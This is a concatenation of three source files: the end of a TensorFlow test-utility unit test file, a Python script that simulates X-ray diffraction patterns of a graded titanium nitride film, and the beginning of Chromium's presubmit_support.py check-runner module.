c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
def testAllCloseNestedDicts(self):
a = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
with self.assertRaisesRegexp(
TypeError,
r"inputs could not be safely coerced to any supported types"):
self.assertAllClose(a, a)
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
def testAssertAllCloseAccordingToType(self):
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
    with self.assertRaises(AssertionError):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
    with self.assertRaises(AssertionError):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
    with self.assertRaises(AssertionError):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
def testRandomSeed(self):
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.with_c_api
class IsolationTest(test_util.TensorFlowTestCase):
@test_util.run_in_graph_and_eager_modes()
def test_variable_reuse_exception(self):
with test_util.IsolateTest(), session.Session():
first_container_variable = resource_variable_ops.ResourceVariable(
name="first_container_variable",
initial_value=1)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
with test_util.IsolateTest():
if context.in_graph_mode():
with self.assertRaises(RuntimeError):
self.evaluate(first_container_variable.read_value())
else:
with self.assertRaises(ValueError):
first_container_variable.read_value()
@test_util.run_in_graph_and_eager_modes()
def test_variable_reuse_exception_nested(self):
with test_util.IsolateTest(), session.Session():
first_container_variable = resource_variable_ops.ResourceVariable(
name="first_container_variable",
initial_value=1)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
with test_util.IsolateTest(), session.Session():
if context.in_graph_mode():
with self.assertRaises(RuntimeError):
self.evaluate(first_container_variable.read_value())
else:
with self.assertRaises(ValueError):
first_container_variable.read_value()
@test_util.run_in_graph_and_eager_modes()
def test_no_sharing(self):
with test_util.IsolateTest(), session.Session():
first_container_variable = resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
with test_util.IsolateTest(), session.Session():
second_container_variable = resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=2)
if context.in_graph_mode():
self.evaluate([variables.global_variables_initializer()])
self.assertEqual(
2, self.evaluate(second_container_variable.read_value()))
self.assertEqual(1, self.evaluate(first_container_variable.read_value()))
def test_graph_mode_isolation(self):
with context.graph_mode():
# Even if we've (accidentally) called IsolateTest in Graph mode, it should
# provide Eager isolation.
with test_util.IsolateTest():
with context.eager_mode():
first_container_variable = resource_variable_ops.ResourceVariable(
name="first_container_variable",
initial_value=1)
with context.eager_mode():
with self.assertRaises(ValueError):
first_container_variable.read_value()
if __name__ == "__main__":
googletest.main()
|
variable-strained.py
|
import numpy as np
import pandas as pd
from scipy.interpolate import interp1d
import itertools as iter
import threading
import sys
import pathlib
import time
from time import sleep
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
done = False
def animate():
for c in iter.cycle(["⢿ ", "⣻ ", "⣽ ", "⣾ ", "⣷ ", "⣯ ", "⣟ ", "⡿ "]):
if done:
break
sys.stdout.write(f'{bcolors.BOLD}{bcolors.OKGREEN}\rtask in progress {bcolors.ENDC}' + '%c' % (c))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
start_time = time.time()
path_str = str(pathlib.Path(__file__).parent.resolve())
class discr_film:
def __init__(self,
hkl_l ,alpha, depth_f, steps, filename, **kwargs):
# incidence X-Ray angle
self.alpha = alpha
self.hkl_l = np.array(hkl_l)
self.I = 10
# thickness and steps (layer size)
self.y = np.linspace(0, depth_f, steps)
self.steps = steps
self.filename = filename
# Å
self.lamb = 1.540562
self.df = self.a_s()
self.c = self.c_y()
self.a = self.a_()
self.d = self.d_()
self.theta = self.theta_()
self.z_f = self.z_f_()
self.v = self.v_()
self.ro = self.ro_()
self.s_f = self.s_f_()
self.f_Ti = self.f_Ti_()
self.f_N = self.f_N_()
self.f_F = self.f_F_()
self.f_m = self.f_m_()
self.ro_film = self.ro_()
self.I_cor = self.I_exp()
# reading the Ni/Ti and a table
def a_s(self):
df = pd.read_csv(self.filename, sep=";", decimal=',', header=0, dtype={'a':np.float64, 'Ni/Ti':np.float64})
df['a'] = df['a']*10e-3
df['v'] = df['a']**3
return df
def c_y(self):
c = []
for y, i in zip(self.y, range(self.steps)):
c.append(
-0.023031+(0.95743+0.023031)/
(1+np.exp((y-1.54092e-6)/1.81375e-7))
)
return c
def a_(self):
a = []
a_interp = interp1d(self.df['Ni/Ti'].tolist(), self.df['a'].tolist(), fill_value="extrapolate")
for i in range(self.steps):
a.append(
float(a_interp(self.c[i])))
return a
def v_(self):
v = []
for i in range(self.steps):
v.append((self.a[i]*1e-1)**3)
return v
def d_(self):
d = []
for h, k, l in self.hkl_l:
for a in self.a:
d.append((a/np.sqrt(h**2 + k**2 + l**2)))
return d
def theta_(self):
theta = []
for i, d in enumerate(self.d):
theta.append((180/np.pi)*(2 * np.arcsin((self.lamb)/(2 * d))))
return theta
def z_f_(self):
z_f = []
for i in range(self.steps):
z_f.append(
((self.y[i] - self.y[i-1])/(np.sin(np.deg2rad(self.alpha))))
)
if z_f[i] < 0:
z_f[i] = 1e-9
return z_f
# LORENTZ FACTOR
def s_f_(self):
s_f = []
for i, t in enumerate(self.theta):
s_f.append(
(1+np.cos(np.deg2rad(t))**2)/((np.sin(np.deg2rad(t/2))**2)*np.cos(np.deg2rad(t/2)))
)
return s_f
def f_Ti_(self):
f_Ti = []
f_Ti_l = pd.read_csv("atom_scattering/Ti_scat.txt", sep=",", decimal='.', dtype={'theta_lamb':np.float64, 'f':np.float64})
f_Ti_interp = interp1d(f_Ti_l['theta_lamb'].tolist(),f_Ti_l['f'].tolist())
count = 0
for i, t in enumerate(self.theta):
f_Ti.append(
float(f_Ti_interp(np.sin(np.deg2rad(t/2))/self.lamb))
)
# print(t, ' ', f_Ti[count])
count += 1
return f_Ti
def f_N_(self):
f_N = []
f_N_l = pd.read_csv("atom_scattering/N_scat.txt", sep=",", decimal='.', dtype={'theta_lamb':np.float64, 'f':np.float64})
f_N_interp = interp1d(f_N_l['theta_lamb'].tolist(),f_N_l['f'].tolist())
count = 0
for i, t in enumerate(self.theta):
f_N.append(
float(f_N_interp(np.sin(np.deg2rad(t/2))/self.lamb))
)
# print(t, f_N[count])
count += 1
return f_N
# |F|^2 factor
def f_F_(self):
f_F = []
count = 0
local = {}
for ind in self.hkl_l:
h,k,l = ind
            local[str(h)+str(k)+str(l)] = pd.read_csv('./s_factors/output_factor_'+str(h)+str(k)+str(l)+'.txt', sep=" ", decimal='.')
local["interp"+str(h)+str(k)+str(l)] = interp1d(local[str(h)+str(k)+str(l)]['c'].to_list(),
local[str(h)+str(k)+str(l)]['|F|^2'].to_list(), fill_value="extrapolate")
i = 0
for ind in self.hkl_l:
h, k, l = ind
string = str(h)+str(k)+str(l)
# print(h, k, l)
for c in self.c:
f_F.append(float(local["interp"+string](c)))
return f_F
def f_m_(self):
f_m = []
div = int(len(self.theta)/len(self.hkl_l))
for i, (ind, t) in enumerate(zip(self.hkl_l, self.theta)):
h, k, l = ind
for i in iter.repeat(ind, int(self.steps)):
if h != k != l != 0:
f_m.append(48)
if h == k == l:
f_m.append(8)
if h != 0 and k == l == 0:
f_m.append(6)
if h == k and l == 0:
f_m.append(12)
if h == k and l != h and l != 0:
f_m.append(24)
if h != k and k == l and k != 0:
f_m.append(24)
if h != k != l and l == 0:
f_m.append(24)
# print(ind, t)
return f_m
def ro_(self):
ro_film = []
for i, c in enumerate(self.c):
ro_film.append(
(4*(47.867 + c * 14.0067)*1e3)/
(6.022e+23 * (self.a[i]*1e-8)**3)
)
# print(c, ro_film[i])
return ro_film
def I_exp(self):
I_0 = self.I
I = []
I_cor = []
I_exp = []
u_p = []
for i in range(self.steps):
w_fN = (self.c[i] * 14.0067)/(47.867 + (self.c[i]*14.0067)) # weight fraction
u_p.append(
(w_fN * 7.17200E+00) + # Nitrogen cm^2/g
((1. - w_fN) * 1.98790E+02) # Titanium cm^2/g
)
for i in range(self.steps):
if self.y[i]-self.y[i-1] < 0:
I_exp.append(0)
else:
I_exp.append(u_p[i] * 0.1 * self.ro_film[i] * (
((self.y[i] - self.y[i-1])/(np.sin(np.deg2rad(self.alpha)))) +
((self.y[i] - self.y[i-1])/(np.sin(np.deg2rad(self.theta[i] - self.alpha))))
))
for i, exp in enumerate(np.cumsum(I_exp)):
I = I_0 * np.exp(-exp)
I_cor.append(I)
return I_cor
def func_(Iy, theta, w, m, x, **kwargs):
if kwargs['func'] == "Lorentz":
return Iy*((1+(x-theta)**2/w**2))**m
if kwargs['func'] == "Gauss":
return (Iy/(w*np.sqrt(np.pi/2))) * np.exp(-2*(x-theta)**2/(w**2))
def split_func(Iy, theta, w1, w2, m1, m2, x, **kwargs):
if kwargs['func'] == "spltpearVII":
if x < theta:
return Iy * (
(w1**(2*m1))/
(w1**2+(2**(1/m1)-1)*(x-theta)**2)**m1
)
if x >= theta:
return Iy * (
(w2**(2*m2))/
(w2**2+(2**(1/m2)-1)*(x-theta)**2)**m2
)
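# Illustrative sketch (not part of the original script): evaluating the split
# Pearson VII profile on a small 2-theta grid. The peak centre (40 deg), the
# left/right widths (0.3/0.4 deg) and the shape exponents (1.5/2.0) are made-up
# demonstration values only.
def _example_split_profile():
    xs = np.arange(39.0, 41.0, 0.1)
    return [split_func(100., 40., 0.3, 0.4, 1.5, 2.0, x, func="spltpearVII") for x in xs]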
# class integration:
hkl_l_fcc = [[1,1,1],
[2,0,0],
[2,2,0],
[3,1,1],
[2,2,2],
[4,0,0]]
hkl_l_bcc = [[1,1,0],
[2,0,0],
[2,1,1]]
angles = [3., 5., 7., 10., 12., 15.]
a_dict = {}
rlt_int = [[1.23, 1.67, 0.45, 0.37], #3
[1.2, 1.2, 0.35, 0.43], #5
[1.3, 1.25, 0.37, 0.46], #7
[1.9, 1.16, 0.28, 0.49], #10
[2.62, 1.22, 0.26, 0.39], #12
[3.56, 1.3, 0.23, 0.63]
] #15
# rlt_int = [[1 for i in range(4)] for i in range(6)]
for a in angles:
string = "array_"+str(int(a))
a_dict[string] = discr_film(hkl_l_fcc, a, 2e-6, 100, "comp_crystal/Ti_N.txt")
x_range = np.arange(30, 80, 0.01)
lamb = 0.1540562
e = 0.0108338412572665
D = 13.3021530274522
for i, a in enumerate(angles):
string = "y_"+str(int(a))
string_w = "w_l_"+str(int(a))
a_dict["y_"+str(int(a))] = [[] for i in range(len(a_dict["array_"+str(int(a))].theta))]
a_dict["w_l_"+str(int(a))] = []
for i, t in enumerate(a_dict["array_"+str(int(a))].theta):
b = (lamb+np.sqrt(lamb**2+4*e**2*D**2*np.sin(np.deg2rad(t/2))**2))/(2*D*np.cos(np.deg2rad(t/2)))
a_dict["w_l_"+str(int(a))].append(np.rad2deg(b))
# print(a_dict["w_l_3"])
sch_dict = {}
sch_dict["sch_3"] = [[0.44,1.7875,7.334],
[0.46, 4.5123,3.03985],
[0.43, 4.1224,7.35653],
[0.46, 7.78303,5.61911]]
def strain_func(psi, e_33, e_hkl, d):
return 2*np.rad2deg(
np.arcsin(lamb/(d*(2+e_33+e_hkl+(e_33*np.cos(2*psi))-(e_hkl*np.cos(2*psi)))))
)
def br(x):
x1 = np.deg2rad(x/2)
return np.rad2deg(
((lamb/np.cos(x1))+np.tan(x1)*np.sqrt(4*D**2*e**2+lamb**2/np.sin(x1)**2))/(2*D)
)
print(f"{bcolors.HEADER}--- %s sec to init calculations --- {bcolors.ENDC}" % (time.time() - start_time))
for a in angles:
a_dict["array_"+str(int(a))+"_c_calc"] = np.array(a_dict["array_"+str(int(a))].c)
a_dict["array_"+str(int(a))+"_theta_calc"] = np.array(a_dict["array_"+str(int(a))].theta)
a_dict["array_"+str(int(a))+"_d_calc"] = np.array(a_dict["array_"+str(int(a))].d)
t = threading.Thread(target=animate)
t.start()
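# For every grazing-incidence angle, build the depth-resolved pattern: each
# layer i contributes one split Pearson VII peak per reflection (111, 200,
# 220, 311; the remaining reflections fall into the generic `else` branch),
# with its position shifted by the strain model and its breadth given by br(t).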
for j, a in enumerate(angles):
for i, (c, t, d) in enumerate(zip(iter.cycle(a_dict["array_"+str(int(a))+"_c_calc"]), a_dict["array_"+str(int(a))+"_theta_calc"], iter.cycle(a_dict["array_"+str(int(a))+"_d_calc"]))):
interval = len(a_dict["array_"+str(int(a))].theta)/len(hkl_l_fcc)
temp = np.empty([len(x_range)], float)
psi = np.sin(np.deg2rad(t/2-a))**2
e33 = 0.
for k,x in enumerate(x_range):
if i <= interval: # 111
e_hkl = 0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][0],t1,sch_dict["sch_3"][0][0]*br(t), br(t)-sch_dict["sch_3"][0][0]*br(t),sch_dict["sch_3"][0][1],sch_dict["sch_3"][0][2],x,func="spltpearVII")/4e4
temp[k] = y
elif interval < i <= 2*interval: # 200
e_hkl = 0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][1],t1,sch_dict["sch_3"][1][0]*br(t), br(t)-sch_dict["sch_3"][1][0]*br(t),sch_dict["sch_3"][1][1],sch_dict["sch_3"][1][2],x,func="spltpearVII")/4e4
temp[k] = y
elif 2*interval < i <= 3*interval: # 220
e_hkl = -0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][2],t1,sch_dict["sch_3"][2][0]*br(t), br(t)-sch_dict["sch_3"][2][0]*br(t),sch_dict["sch_3"][2][1],sch_dict["sch_3"][2][2],x,func="spltpearVII")/4e4
temp[k] = y
elif 3*interval < i <= 4*interval: # 311
e_hkl = -0.
t1 = strain_func(psi, e33, e_hkl, d/10)
y = split_func(rlt_int[j][3],t1,sch_dict["sch_3"][3][0]*br(t), br(t)-sch_dict["sch_3"][3][0]*br(t),sch_dict["sch_3"][3][1],sch_dict["sch_3"][3][2],x,func="spltpearVII")/4e4
temp[k] = y
else:
y = split_func(1, t, 0.4, 0.4, 1.1, 1.1, x, func="spltpearVII")/4e4
temp[k] = y
a_dict["y_"+str(int(a))][i] = temp
print(f"{bcolors.HEADER}--- %s seconds for alpha = %a ---{bcolors.ENDC}" % (time.time() - start_time, int(a)))
time.sleep(10)
done = True
print(f"{bcolors.BOLD}--- %s sec to complete --- {bcolors.ENDC}" % (time.time() - start_time))
for a in angles:
with open('data_output/var_strained_'+str(a)+'_intensity.txt', 'w') as f:
for i, (t, x, L, I, F, p) in enumerate(zip(a_dict["array_"+str(int(a))].theta, a_dict["y_"+str(int(a))], a_dict["array_"+str(int(a))].s_f,
iter.cycle(a_dict["array_"+str(int(a))].I_cor), a_dict["array_"+str(int(a))].f_F, a_dict["array_"+str(int(a))].f_m)):
a_dict["y_"+str(int(a))][i] = [y * F * p * L * I for y in x]
print(t, '\t', I, '\t', F,'\t', p, '\n', file = f)
x_label = [r"$2\theta$",
r"depth [$\mu m$]"]
y_label = [r"I [a.u.]",
r"\Large$\frac{\text{N}}{\text{Ti}}$"]
# multipliers = [2.56,1.87,1.61,1.43,1.36,1.32]
multipliers = [1., 1., 1., 1., 1., 1.,]
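# Sum the contributions of all layers into one diffractogram per angle,
# optionally rescaled by `multipliers`.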
for a, m in zip(angles, multipliers):
a_dict["y_conv_"+str(int(a))] = [sum(i) * m for i in zip(*a_dict["y_"+str(int(a))])]
# File outputs
for a in angles:
with open('data_output/output_var_strained_'+str(int(a))+'.txt', 'w') as f:
# print("2theta", '\t', "y_conv", "\n",file=f)
for x, y in zip(x_range, a_dict["y_conv_"+str(int(a))]):
print(x,'\t' ,y, file=f)
with open('data_output/output_var_strained_conc.txt', 'w') as f:
# print("2theta", '\t', "y_conv", "\n",file=f)
for x, y in zip(a_dict["array_3"].y, a_dict["array_3"].c):
print(x,'\t' ,y, file=f)
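# NB: the files above are written with '.' as the decimal separator, while
# read_csv below is called with decimal=",".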
dic = {}
for i,a in enumerate(angles):
dic['df'+str(int(a))] = pd.read_csv('data_output/output_var_strained_'+str(int(a))+'.txt', sep='\t',decimal=",")
finaldf = pd.concat([dic['df3'],dic['df5'],dic['df7'],dic['df10'],dic['df12'],dic['df15']], axis=1, join='inner').sort_index()
finaldf.to_csv('data_output/output_variable_strained_ALL.txt', sep='\t')
print(finaldf)
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import cPickle # Exposed through the API.
import cpplint
import cStringIO # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib2 # Exposed through the API.
import urlparse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception):
pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return stdout, stderr
sigint_handler = SigintHandler()
class ThreadPool(object):
def __init__(self, pool_size=None):
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of "python"
to vpython invocations.
"""
vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
try:
start = time.time()
p = subprocess.Popen(cmd, **test.kwargs)
stdout, _ = sigint_handler.wait(p, test.stdin)
duration = time.time() - start
except OSError as e:
duration = time.time() - start
return test.message(
'%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
if p.returncode != 0:
return test.message(
'%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
if test.info:
return test.info('%s (%4.2fs)' % (test.name, duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
def __init__(self, input_stream=None, output_stream=None):
self.input_stream = input_stream
self.output_stream = output_stream
self.reviewers = []
self.more_cc = []
self.written_output = []
self.error_count = 0
def prompt_yes_no(self, prompt_string):
self.write(prompt_string)
if self.input_stream:
response = self.input_stream.readline().strip().lower()
if response not in ('y', 'yes'):
self.fail()
else:
self.fail()
def fail(self):
self.error_count += 1
def should_continue(self):
return not self.error_count
def write(self, s):
self.written_output.append(s)
if self.output_stream:
self.output_stream.write(s)
def getvalue(self):
return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
    However, the API isn't very clear about what's inside, so see the tests for an example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
    # info is a reference to the cache. We'll modify it here, adding the
    # description to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].iteritems():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
values = labelinfo.get('values', {}).keys()
try:
max_value = max(int(v) for v in values)
reviewers = [r for r in labelinfo.get('all', [])
if r.get('value', 0) == max_value]
except ValueError: # values is the empty list
reviewers = []
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
